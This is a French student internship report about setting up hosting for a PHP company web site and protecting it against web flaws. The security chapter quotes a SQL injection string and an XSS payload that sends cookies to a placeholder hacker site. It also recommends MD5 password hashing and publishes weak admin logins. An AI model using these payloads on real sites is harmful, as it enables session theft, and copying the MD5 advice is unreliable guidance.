rapport de stage de perfectionnement - mahmoudi mohamed amine

30
Institut Supérieur des Études Technologiques De Mahdia Département Technologies de l’Informatique Rapport de Stage de Perfectionnement Elaboré par : Mohamed Amine Mahmoudi Période du stage : 11/01/2016 à 07/02/2016 Société d’accueil : EL BOOTIC ©Année Universitaire 2015-2016©

Upload: mohamed-amine-mahmoudi

Post on 16-Apr-2017

847 views

Category:

Education


36 download

TRANSCRIPT

Page 1: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Institut Supérieur des Études Technologiques

De Mahdia

Département Technologies de l’Informatique

Rapport de

Stage de Perfectionnement

Elaboré par :

Mohamed Amine Mahmoudi

Période du stage : 11/01/2016 à 07/02/2016

Société d’accueil : EL BOOTIC

©Année Universitaire 2015-2016©

Page 2: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Remerciements

Au terme de ce stage je tien a exprimer mes respects mais

connaissances et mes sincère remerciement au personnels du

EL BOOTIC, le directeur de la société AYED HATEM, qui

ont contribués à l’élaboration de ce rapport modeste.

Ainsi ceux qui mon aidées durant cette période pour effectuer

mon stage dans les meilleurs conditions, et je tiens également

à remercier virement tous ceux qui m’ont fait preuve d’un

grand esprit de collaboration et d’initiative tous les personnels

de l’équipe technique et qui m’apportent une aide précieuse

par leurs suggestion et leurs conseils.

Que tous ceux qui ont contribué de près ou de loin à la

réalisation de ce travail trouvent ici l’expression de nos

sincères gratitudes.

Page 3: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Sommaire

Table des matières

Introduction générale ...........................................................................................................................1

Chapitre 1 : Présentation du cadre du stage ........................................................................................2

I. Introduction ....................................................................................................................2

II. Présentation de la société ................................................................................................2

III. Contexte du stage ...........................................................................................................2

IV. Conclusion ......................................................................................................................3

Chapitre 2 : Notions théoriques ............................................................................................................4

I. Introduction ....................................................................................................................4

II. Hébergement ...................................................................................................................4

1. Définition .................................................................................................................4

2. Types ........................................................................................................................4

3. Exemples des hébergeurs .........................................................................................5

III. Références web ..............................................................................................................5

1. Définition .................................................................................................................5

2. Types ........................................................................................................................5

IV. Les Failles web ..............................................................................................................6

3. Définition .................................................................................................................6

4. Types des failles .......................................................................................................6

V. Outils de développement ................................................................................................7

1. PHP ..........................................................................................................................7

2. SQL ..........................................................................................................................7

3. Javascript et Jquery ..................................................................................................7

4. Bootstrap ..................................................................................................................7

VI. Conclusion ......................................................................................................................7

Chapitre 3 : Spécification des besoins ..................................................................................................8

I. Introduction ....................................................................................................................8

II. Besoins fonctionnels .......................................................................................................8

III. Besoins non fonctionnels ...............................................................................................8

IV. Diagramme de cas d’utilisation ......................................................................................8

Page 4: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

V. Conclusion ......................................................................................................................9

Chapitre 4 : Conception .......................................................................................................................10

I. Introduction ..................................................................................................................10

II. Diagramme de séquence ..............................................................................................10

III. Diagramme de classe ....................................................................................................11

IV. Conclusion ....................................................................................................................12

Chapitre 5 : Tâches Effectuées ............................................................................................................13

I. Introduction ..................................................................................................................13

II. Configuration de l’hébergement web ..........................................................................13

1. Réserver le nom du domaine ..................................................................................13

2. FTP .........................................................................................................................14

3. Mail ........................................................................................................................14

4. Base des données ....................................................................................................14

5. Autres Tâches .........................................................................................................14

III. Réalisation ....................................................................................................................15

1. Partie principale .....................................................................................................15

2. Partie Administrateur .............................................................................................16

3. Partie Client ............................................................................................................17

IV. Sécurité du site .............................................................................................................15

1. Faille Injection SQL ...............................................................................................18

2. Faille XSS ..............................................................................................................18

3. Cryptage des données .............................................................................................19

V. Conclusion ....................................................................................................................19

Conclusion générale .............................................................................................................................20

Bibliographie et Nétographie .............................................................................................................21

Annexe ...................................................................................................................................................22

Page 5: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Liste des figures

Table des Figures

Figures 1 : diagramme de cas d’utilisation ................................................................................ 9

Figures 2 : diagramme de séquence ........................................................................................ 10

Figures 3 : diagramme de classe ............................................................................................. 11

Figures 4 : réservation nom du domaine ................................................................................. 13

Figures 5 : Envoyé les fichiers avec Filezilla .......................................................................... 14

Figures 6 : Base des données PhpMyAdmin ........................................................................... 15

Figures 7 : site web en partie principale .................................................................................. 16

Figures 8 : authentification des administrateurs ...................................................................... 16

Figures 9 : tableau de bord pour les administrateurs .............................................................. 17

Figures 10 : Panneau de contrôle pour les clients ......................................................................... 17

Page 6: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Introduction générale

Stage de Perfectionnement Page 1

Introduction générale

Dans l’occasion de la période de stage j’examine comment crée une application

mobile exactement une version Android, tous les universités et les instituts supérieurs l’étude

pratique dans l’étude théorique à partir de stages qui ont la durée des études.

Le stage est un moyen qui permet à l’étudiant de s’intégrer dans la vie professionnelle en vue

d’avoir une idée générale sur le fonctionnement de l’entreprise. A ce niveau, l’objectif des

instituts supérieurs des études technologies est de permet à l’étudiant d’enrichir ses

connaissances et de s’adapter à l’environnement de l’entreprise.

En effet, mon stage d’ouvrir m’a permis l’occasion de s’intégrer au sien de la vie

professionnelle et d’élargir mes connaissances.

Finalement, l’objectif de ce stage est de faire une intervention pratique qui me permet

d’appliquer mes connaissances scientifiques et techniques relatives au domaine de

l’informatique, et de tester mes facultés d’analyse et de synthèse.

Page 7: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 1 : Présentation du cadre du stage

Stage de Perfectionnement Page 2

Chapitre 1 : Présentation du cadre du stage

I. Introduction

Dans ce chapitre, nous allons présenter en premier lieu la société dans laquelle nous

avons effectué notre sujet de travail proposé tout en expliquant ses objectifs ainsi les

fonctionnalités nécessaires pour le réaliser.

II. Présentation de la société

EL BOOTIC est une société spécialisée dans le commerce et la maintenance du

matériel informatique, ainsi que dans le développement des logiciels et applications

informatiques. EL BOOTIC a été créée le 20 mai 2000 par hatem ayed sous forme de

société à responsabilité limitée (SARL). Grâce à la volonté qui anime l’équipe pour

fournir les meilleurs services aux clients et la qualité du matériel informatique, EL

BOOTIC a rapidement pris sa place sur le marché. Leurs activités sont diverses : vente

matériels et accessoires informatiques, maintenance et réparation matériels

informatiques et pièces électroniques, développement de logiciels, création des sites

WEB, assistance des entreprises.

Le stage s’est effectué en précisant sa vocation du développement un site web

moderne, efficace, et dans période exacte

Son adresse est Av hbib bourguiba Ksibet El Medyouni 5031

III. Contexte du stage

Dans l’objectif de maitriser et approfondir nos connaissances déjà acquises, la société

el bootic nous a accueillis dans ces locaux.

Elle nous a proposé comme sujet de suivre des formations sur les outils bureautiques

et approfondir les connaissances dans le développement mobile.

Les formations proposées par la société :

Création un site web dynamique & hébergée

Page 8: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 1 : Présentation du cadre du stage

Stage de Perfectionnement Page 3

Les formations consistent à connaitre les différentes fonctionnalités de ces outils, bien

maitrisés ces connaissances à l’aide des exemples et des travaux pratiques.

IV. Conclusion

A travers ce chapitre, nous avons présenté le cadre du projet, identifié à atteindre et le

travail à faire. Compte tenu de cela, nous proposant les détails du travail dans le

chapitre suivant.

Page 9: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 2 : Notations théoriques

Stage de Perfectionnement Page 4

Chapitre 2 : Notions théoriques

I. Introduction

Avant de commencer le travail, nous présentons quelques notions théoriques

utilise dans mon stage.

Tout d'abord, nous identifions les mots importants, Cela m'a aidé à compléter le

travail requis et les mots techniques au cadre de stage.

II. Hébergement

1. Définition

Est une entité ayant pour vocation de mettre à disposition

des internautes des sites web conçus et gérés par des tiers.

Il donne ainsi accès à tous les internautes au contenu déposé dans leurs

comptes par les webmestres souvent via un logiciel FTP ou un gestionnaire de

fichiers. Pour cela, il maintient des ordinateurs allumés et connectés 24 heures

sur 24 à Internet (des serveurs web par exemple) par une connexion à très haut

débit (plusieurs centaines de Mb/s), sur lesquels sont installés des

logiciels : serveur HTTP (souvent Apache), serveur de messagerie, de base de

données...

2. Types

Les hébergements partagés ou mutualisés : Chaque serveur héberge

plusieurs sites, jusqu'à plusieurs milliers, et ce dans le but de mutualiser

les coûts. Le principal avantage est le prix, le principal inconvénient est

que le client mutualisé n'est pas l'administrateur du serveur, il est donc

souvent tributaire du bon vouloir de l'hébergeur s'il souhaite une

technologie particulière.

Les hébergements dédiés : Le client dispose alors de son propre

serveur, et peut en général l'administrer comme il le souhaite, ce qui est

le principal avantage de ce type d'offre. Le fournisseur du serveur reste

cependant propriétaire du serveur. Les inconvénients sont : le prix

Page 10: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 2 : Notations théoriques

Stage de Perfectionnement Page 5

beaucoup plus élevé que les hébergements mutualisés, et le besoin de

compétences pour administrer la machine correctement.

L'hébergement virtuel dédié via un hyperviseur qui offre au client la

souplesse d'un dédié (le client administre sa machine à sa convenance)

en lui fournissant une machine virtuelle qui utilise une partie des

ressources d'un serveur (physique) par des techniques de virtualisation

(informatique).

Les hébergements dédiés dits « managés », avec « serveur dédié info

géré » ou « clés en main » : Le client dispose de son propre serveur

mais les techniciens de l'hébergeur s'occupent de sa gestion système.

Cette solution est parfaite si vous n'avez aucune connaissance

technique sur son administration. Il suffit simplement de déposer son

site. Ce type d'hébergement cherche à s'adapter aux besoins.

3. Exemples des hébergeurs

OVH

1and1

Gandi

One

Ikola

Lws

Hostgator

Etc…

III. Référencement web

1. Définition

C’est l’identifier le site dans les moteurs des recherches, c’est-à-dire

l’indexation les pages.

2. Types

Le référencement naturel, il est directement en lien avec les contenus de

votre site. Votre positionnement est le révélateur de la bonne

compréhension de vos contenus par les moteurs de recherche.

Le référencement manuel est la deuxième clef de votre succès sur

internet. Votre position sur Google dépend de votre popularité

Page 11: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 2 : Notations théoriques

Stage de Perfectionnement Page 6

mesurée notamment par le nombre de liens de qualité qui pointent vers

votre site. D'où la nécessité du référencement manuel.

Le référencement publicitaire, ce sont des liens mis en place depuis des

bannières publicitaires, les adwords, les animations, les jeux, les buzz.

Le référencement de localisation (Google maps), il favorisera toutes les

requêtes effectuées sur des critères géographiques.

IV. Les failles web

1. Définition

Une faille c'est en fait une faiblesse dans un code qui peut être exploitée

pour détourner un site de sa fonction première. Le pirate va pouvoir

récupérer des données confidentielles (comme les infos personnelles des

inscrits) ou modifier le comportement du site. Mais heureusement pour

nous, il est possible de se protéger de ces fameuses failles.

2. Type des failles

L’injection SQL : L'injection SQL est une méthode d'attaque très

fréquemment utilisée dans le monde du hack. Elle consiste à modifier

une requête SQL en injectant des morceaux de code non-filtrés,

généralement par le biais d'un formulaire.

La faille include : à faille include est également très dangereuse.

Comme son nom l'indique, elle exploite une mauvaise utilisation de la

fonction include(). Cette fonction est très souvent utilisée pour

exécuter du code PHP se situant dans une autre page, et

particulièrement pour la connexion à une base de données.

La faille upload : La faille upload est une des failles les plus

dangereuses. Vous connaissez sûrement la balise HTML qui permet

l'upload de fichier

La faille XSS : (plus officiellement appelée Cross-Site Scripting) est

une faille permettant l'injection de code HTML ou JavaScript dans des

variables mal protégées.

CSRF : Cross site request forgery

CRLF : Carriage Return Line Feed

Etc.

Page 12: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 2 : Notations théoriques

Stage de Perfectionnement Page 7

V. Outils du développement

1. PHP

HyperText Preprocessor, plus connu sous son sigle PHP (acronyme récursif),

est un langage de programmation libre principalement utilisé pour produire

des pages Web dynamiques via un serveur HTTP, mais pouvant également

fonctionner comme n'importe quel langage interprété de façon locale. PHP est

un langage impératif orienté objet comme C++. PHP a permis de créer un

grand nombre de sites web célèbres, comme Facebook, YouTube,

Wikipedia, etc. Il est aujourd'hui considéré comme la base de la création des

sites Internet dits dynamiques.

2. SQL

Sigle de « Structured Query Language », en français langage de requête

structurée est un langage informatique normalisé servant à exploiter des bases

de données relationnelles. La partie langage de manipulation des données de

SQL permet de rechercher, d'ajouter, de modifier ou de supprimer des données

dans les bases de données relationnelles.

3. JavaScript et Jquery

JavaScript est un langage de programmation de scripts principalement employé

dans les pages web interactives mais aussi pour les serveurs.

4. Bootstrap

Bootstrap est un framework front-end (HTML5, CSS et JavaScript)

spécialement conçu pour le développement d'application web "responsive",

c'est-à-dire qui s’adapte automatiquement à différents dispositifs et tailles

d'écran (desktop, tablettes, smartphones, ...).

VI. Conclusion

Dans ce chapitre nous avons eu sur certains mots clés que j’ai utilisés dans le

stage et en cours de la création d’application. Quelle sont c'est tâches ?

Page 13: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 3 : Spécification des besoins

Stage de Perfectionnement Page 8

Chapitre 3 : Spécification des besoins

I. Introduction

Pendant la période de mon stage j'ai fait des tâches, qui sont généralement de

création une application mobile de la société.

Pour cela je définirai les tâches, qu'on j'ai fait durant la période de stage.

II. Besoins fonctionnels

Avant la création de l’application il faut définir quelques besoins fonctionnels sont

généralement

Partie pour les administrateurs

Partie pour les clients

Sécurité

Vend en ligne

Synthèse statistique

III. Besoins non fonctionnels

Les besoins non fonctionnels décrivent toutes les contraintes auxquelles est soumis

le système pour sa réalisation et son bon fonctionnement.

Ergonomie et souplesse

Rapidité

Efficacité

IV. Diagramme de cas d’utilisation

Page 14: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 3 : Spécification des besoins

Stage de Perfectionnement Page 9

Figure 1 : diagramme de cas d’utilisation

V. Conclusion

Dans ce chapitre on a présenté une étude du système existant, les lacunes qu’il

comprend ainsi que les solutions que nous proposons pour pallier ces problèmes,

nous avons aussi cité les besoins fonctionnels et non fonctionnels qui sont

indispensables pour mieux faciliter le travail à réaliser.

Dans le chapitre suivant nous allons aborder l’étude conceptuelle de notre site, tout

en mentionnant tous les scénarios possibles, les acteurs, les diagrammes.

Page 15: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 4 : Conception

Stage de Perfectionnement Page 10

Chapitre 4 : Conception

I. Introduction

Ce chapitre a pour objectif de présenter la solution conceptuelle proposée. En

d’autres termes, ce chapitre devrait répondre à la question comment faire.

La conception est décrite par un ensemble de diagrammes relevant soit du langage

de modélisation UML.

II. Diagramme de séquence

Figure 2 : Diagramme de séquence

Page 16: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 4 : Conception

Stage de Perfectionnement Page 11

III. Diagramme de classe

Figure 3 : Diagramme de classe

Page 17: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 4 : Conception

Stage de Perfectionnement Page 12

IV. Conclusion

En clair, comme nous venons de le voir, ce chapitre était consacré, à la conception

des diagrammes, de séquence qui nous ont permis de dégager l'architecture

générale de notre application représentée ici par ce diagramme de classe qui nous

renseigne sur la relation homme Machine de notre application qui sera détaillée

dans le prochain chapitre.

Page 18: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 5 : Tâches Effectuées

Stage de Perfectionnement Page 13

Chapitre 5 : Tâches Effectuées

I. Introduction

Après avoir placé notre projet dans son cadre général, une étape indispensable

serait de présenter l’environnement sur lequel se base l’application. Dans ce

chapitre, nous allons présenter les outils bureautiques tels que les notions des

hébergements web étudié pour améliorer, élargir et bien maitriser nos

connaissances.

II. Configures de l’Hébergement Web

1. Réserver nom du domaine

Dans cadre de stage en va réserver un nom du domaine, tout d’abord je

recherche un nom existe, c’est-à-dire le nom n’est pas réserver

Exemple.com … Réserver

Devarabe.com …n’est pas réservé donc j’acheté.

Je utilisé www.whois.com

Figure 4 : réservation nom du domaine

Page 19: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 5 : Tâches Effectuées

Stage de Perfectionnement Page 14

2. FTP

Après le commander l’hébergement, je crée des comptes FTP (File

Transfer Protocol). Ce service permet d’envoi les grands fichiers au serveur

du site facilement, par suite je envoyé les fichiers en utilise logiciel

Filezilla

Figure 5 : Envoyé les fichiers avec Filezilla

3. Mail

L’hébergeur offre des nombres des comptés mail et une interface pour

contrôle les emails. Il existe plusieurs applications web pour les emails,

mais généralement en utilisent

Roundcube

Horde

SquirrelMail

4. Base des données

Page 20: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 5 : Tâches Effectuées

Stage de Perfectionnement Page 15

Pour chaque hébergeur ou par un offre d’hébergement, l’hébergeur

donnée un nombre des basées des données (1, 2, 3 ou illimité).

J’obtenue 5 basés qui travaille avec phpmyadmin en utilise langage

SQL, tout d’abord création du tables et liée entre eux.

Lorsque j’installe WordPress les tables créent automatiquement au sien

de l’interruption du script d’installation WordPress.

Figure 6 : base des données PhpMyAdmin

5. Autre Tâches

Au cours de configurations de l’hébergement, je modifie le mot de

passe de contrôle panel qui je réservoir à partir de l’hébergement, je

respect des normes lorsque en crée le mot de passe comme l’utilisation

des caractères minuscule & majuscule, des chiffres et des symboles.

Ainsi que je crée les sous domaine c’est-à-dire une racine de site

comme suit SOUS_DOMAINE.NOM_SITE.COM.

Puis je modifier les paramètres du DNS pour le pointage sur domaine,

autrement l’hébergeur fait lé automatiquement.

III. Réalisation

1. Partie Principale

Page 21: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 5 : Tâches Effectuées

Stage de Perfectionnement Page 16

C’est la partie accessible par tous les visiteurs du site web, qui en trouvent

les informations de la société.

Figure 7 : site web en partie principale

2. Partie Administrateur

Figure 8 : authentification des administrateurs

Page 22: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 5 : Tâches Effectuées

Stage de Perfectionnement Page 17

Figure 9 : tableau de bord pour les administrateurs

3. Partie Client

Figure 10 : Panneau de contrôle pour les clients

Page 23: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 5 : Tâches Effectuées

Stage de Perfectionnement Page 18

IV. Sécuriste du site

1. Faille Injection SQL

Cette faille apparaît quand il est possible d'injecter du code SQL dans les

requêtes SQL qui sont faites dans une page web. C'est actuellement la

"meilleure" vulnérabilité Web en rapport fréquence/surface d'exploitation.

Les conséquences d'une faille SQL peuvent être multiples, du

contournement de formulaires d'authentification au dump complet de la base

de données en passant par l'exécution arbitraire de code. Dans ce premier

article, nous allons essayer de nous familiariser avec des injections simples

(appelées aussi injections du premier ordre).

Exemple : ‘ OR 1=1 OR ‘’=’

Premièrement, le plus important, filtrer les variables dans les formulaires.

Moi personnellement j'utilise une fonction PHP qui me permet de savoir s'il

y a un espace ou tous autres caractères spéciaux non désirés. Il est aussi

important de préciser que si vous protéger votre formulaire par une fonction

JavaScript un pirate va recopier votre formulaire et exploiter en local rien de

plus facile, alors à ne pas faire.

2. Faille XSS

Il existe en fait deux type de XSS :

Le XSS réfléchi (non permanent)

Le XSS stocké (permanent)

Exemple : <SCRIPT>ALERT('IL Y A UNE FAILLE XSS')</SCRIPT>

Exemple : <IMG SRC="AZERTY.JPG"

ONERROR="WINDOW.LOCATION='HTTP://WWW.SITE_DU_HACKER.COM/RECUPERATION_COOKI

E.PHP?COOKIE='+DOCUMENT.COOKIE;">

La solution la plus adaptée contre cette faille est d'utiliser la fonction

HTMLSPECIALCHARS(). Cette fonction permet de filtrer les symboles du type <, &

ou encore ", en les remplaçant par leur équivalent en HTML. Par exemple :

Le symbole & devient &amp;

Le symbole " devient &quot;

Le symbole ' devient &#39;

Page 24: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Chapitre 5 : Tâches Effectuées

Stage de Perfectionnement Page 19

$PSEUDO = HTMLSPECIALCHARS ($_POST ['PSEUDO']);

3. Cryptage des données

Dans la base des données l’insertion des données et sur tout la colonne de

mot de passe sera crypte avec la fonction MD5() pour assurer bien la

sécurité des comptes des administrateurs et leurs clients

V. Conclusion

Dans le chapitre réalisation nous avons appelé à présenter les interfaces réalisé

dans notre site web pour clarifier les étapes d’utilisation de notre site avec ses

deux parties statique et dynamique.

Page 25: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Conclusion générale

Page 20

Conclusion générale

Ce travail a été réalisé dans le cadre de notre stage de perfectionnement de un mois au sein de

Institué Supérieur des Etudes Technologique de Mahdia Durant notre stage nous a été

bénéfique bien sur le plan théorique que pratique.

Ce stage été une bonne occasion pour élargir mes connaissances pratiques pour s’adapter aux

nouvelles technologies qui s’améliorent jour pour persister dans un secteur qui s’éveille chaque jour

sur des nouvelles innovations.

Le projet m’a également donnée l’occasion de mieux de la société de service informatique, leur

fonctionnement en interne et vis-à-vis des clients, c’est un milieu qu’il est utile d’appréhender pour

débuter sa carrière en tant que développeur.

En guise de perspective, une formation techniques d’hébergement sera très intéressent pour suivre les

améliorations technologiques, des connaissances en accès seront bien complémentaire à mes

connaissances.

Pour voir le site : www.lelkol.net/StageDePerfectionnement/

Administrateur : www.lelkol.net/StageDePerfectionnement/admin/ Login : med pass : 123456

Client: www.lelkol.net/StageDePerfectionnement/client/ Login : med pass : azerty

Page 26: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Bibliographie et Nétographie

Stage de Perfectionnement Page 21

Bibliographie et Nétographie

[1] Sylvain Baudoin. « Télécharger Comment Héberger Son Site Web Chez Soi », Paris, 2008, 200p

[2] Damien Nouvel. « Création de site web Hébergement de site web », Paris, 2005, 53p

[3] Christophe AUBRY. « WordPress 4Un CMS pour créer et gérer blogs et sites Web »,473p

[4] Patrick Zemour. « Le guide pratique WordPress Créez et animez vos blogs et sites web »,

2012,154p

[5] http://guides.ovh.com/ : guide d’utilisation l’hébergeur OVH

[6] http://getbootstrap.com/: base des connaissances sur Bootstrap

[7] http://www.w3schools.com/bootstrap/: Exemple en ligne en utilisent Bootstrap

[8] https://openclassrooms.com/courses/protegez-vous-efficacement-contre-les-failles-web: Tutorial

sur les failles web.

[9] http://fr.wikipedia.org/wiki/Hébergeur_web : Hébergeur web

[10] http://fr.wikipedia.org/wiki/CPanel : Cpanel

[11] http://www.networking4all.com/fr/support/certificats+ssl/manuels/cpanel/ : Cpanel

[12] http://fr.wikipedia.org/wiki/Hébergement_mutualisé : hébergement mutualisé

[13] http://openclassrooms.com/courses/ameliorez-la-visibilite-de-votre-site-grace-au-

referencement : Améliorez la visibilité de votre site grâce au référencement

[14] http://www.w3c2i.com/faqs/differents-types-de-referencement.html : DIFFÉRENTS TYPES DE

RÉFÉRENCEMENT

[15] http://www.bases-hacking.org/failles-web.html : Les failles web

Page 27: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

ANNEXE

Stage de Perfectionnement Page 22

Liste des annexes :

Annexe 1 : Facture d’hébergement

Annexe 2 : Création Base des données sur serveur

Annexe 3 : Structure de base des données

Page 28: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Annexe 1 : Facture d’hébergement

Page 29: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Annexe 2 : Création Base des données sur Serveur

Page 30: Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

Annexe 3 : Structure de la Base des données